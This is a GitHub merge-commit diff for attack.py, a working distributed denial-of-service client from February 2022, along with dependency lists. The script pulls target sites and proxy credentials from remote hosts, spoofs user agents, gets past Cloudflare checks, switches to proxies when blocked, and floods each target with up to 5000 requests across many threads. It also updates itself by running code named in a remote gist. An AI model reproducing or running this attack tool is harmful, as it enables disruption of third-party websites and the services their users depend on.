Merge pull request #3 from SterbenXIII/main
AlexTrushkovsky authored Feb 27, 2022
2 parents e9c9927 + fe65aa5 commit a50a00f
Showing 3 changed files with 80 additions and 69 deletions.
146 changes: 78 additions & 68 deletions attack.py
@@ -1,12 +1,9 @@
import cloudscraper
-import requests
import os
-from bs4 import BeautifulSoup
from urllib.parse import unquote
from gc import collect
from loguru import logger
from os import system
-from requests import get
from sys import stderr
from threading import Thread
from random import choice
@@ -15,7 +12,6 @@
from pyuseragents import random as random_useragent
from json import loads

-from urllib.request import urlopen
import json
import sys

@@ -24,82 +20,96 @@
MAX_REQUESTS = 5000
disable_warnings()
def clear(): return system('cls')


logger.remove()
-logger.add(stderr, format="<white>{time:HH:mm:ss}</white> | <level>{level: <8}</level> | <cyan>{line}</cyan> - <white>{message}</white>")
+logger.add(
+    stderr, format="<white>{time:HH:mm:ss}</white> | <level>{level: <8}</level> | <cyan>{line}</cyan> - <white>{message}</white>")
threads = int(sys.argv[1])


def checkReq():
os.system("python3 -m pip install -r requirements.txt")
os.system("python -m pip install -r requirements.txt")
os.system("pip install -r requirements.txt")
os.system("pip3 install -r requirements.txt")
os.system("python3 -m pip install -r requirements.txt")
os.system("python -m pip install -r requirements.txt")
os.system("pip install -r requirements.txt")
os.system("pip3 install -r requirements.txt")


def checkUpdate():
print("Checking Updates...")
updateScraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
try:
content = updateScraper.get(url).content
if content:
data = json.loads(content)
new_version = data["version"]
print(new_version)
if int(new_version) > int(VERSION):
print("New version Available")
os.system("python updater.py " + str(threads))
os.system("python3 updater.py " + str(threads))
exit()
else:
sleep(5)
checkUpdate()
except:
sleep(5)
checkUpdate()
print("Checking Updates...")
updateScraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
try:
content = updateScraper.get(url).content
if content:
data = json.loads(content)
new_version = data["version"]
print(new_version)
if int(new_version) > int(VERSION):
print("New version Available")
os.system("python updater.py " + str(threads))
os.system("python3 updater.py " + str(threads))
exit()
else:
sleep(5)
checkUpdate()
except:
sleep(5)
checkUpdate()


def mainth():
-    scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
-    scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
+    scraper = cloudscraper.create_scraper(
+        browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+    scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
+                            'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})

    while True:
-        scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
-        scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
+        scraper = cloudscraper.create_scraper(
+            browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+        scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
+                                'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
        logger.info("GET RESOURCES FOR ATTACK")
        content = scraper.get(choice(HOSTS)).content
        if content:
            data = loads(content)
        else:
            sleep(5)
            continue
        logger.info("STARTING ATTACK TO " + data['site']['page'])
        site = unquote(data['site']['page'])
        if site.startswith('http') == False:
            site = "https://" + site
        try:
            attack = scraper.get(site)
-            if attack.status_code >= 302 and attack.status_code >= 200:
+            if attack.status_code >= 302:
                for proxy in data['proxy']:
-                    scraper.proxies.update({'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
+                    scraper.proxies.update(
+                        {'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
                    response = scraper.get(site)
                    if response.status_code >= 200 and response.status_code <= 302:
                        for i in range(MAX_REQUESTS):
                            response = scraper.get(site)
-                            logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
+                            logger.info("ATTACKED; RESPONSE CODE: " +
+                                        str(response.status_code))
            else:
                for i in range(MAX_REQUESTS):
                    response = scraper.get(site)
-                    logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
+                    logger.info("ATTACKED; RESPONSE CODE: " +
+                                str(response.status_code))
        except:
            logger.warning("issue happened")
            continue


def cleaner():
    while True:
        sleep(60)
        checkUpdate()
        clear()
        collect()


if __name__ == '__main__':
clear()
2 changes: 1 addition & 1 deletion requirements.txt
@@ -1,7 +1,7 @@
beautifulsoup4==4.10.0
names==0.3.0
cloudscraper==1.2.58
-loguru==0.5.3
+loguru==0.6.0
requests
urllib3==1.26.7
uuid==1.30
1 change: 1 addition & 0 deletions target/pylist.json
@@ -0,0 +1 @@
[{"package": "beautifulsoup4", "version": "4.10.0", "deps": [{"package": "soupsieve", "version": "2.3.1"}]}, {"package": "names", "version": "0.3.0", "deps": []}, {"package": "cloudscraper", "version": "1.2.58", "deps": [{"package": "pyparsing", "version": "3.0.7"}, {"package": "charset-normalizer", "version": "2.0.12"}, {"package": "urllib3", "version": "1.26.7"}, {"package": "requests-toolbelt", "version": "0.9.1"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "requests", "version": "2.27.1"}, {"package": "idna", "version": "3.3"}]}, {"package": "loguru", "version": "0.6.0", "deps": []}, {"package": "requests", "version": "2.27.1", "deps": [{"package": "urllib3", "version": "1.26.7"}, {"package": "idna", "version": "3.3"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "charset-normalizer", "version": "2.0.12"}]}, {"package": "urllib3", "version": "1.26.7", "deps": []}, {"package": "uuid", "version": "1.30", "deps": []}, {"package": "pysocks", "version": "1.7.1", "deps": []}, {"package": "pyuseragents", "version": "1.0.5", "deps": []}]
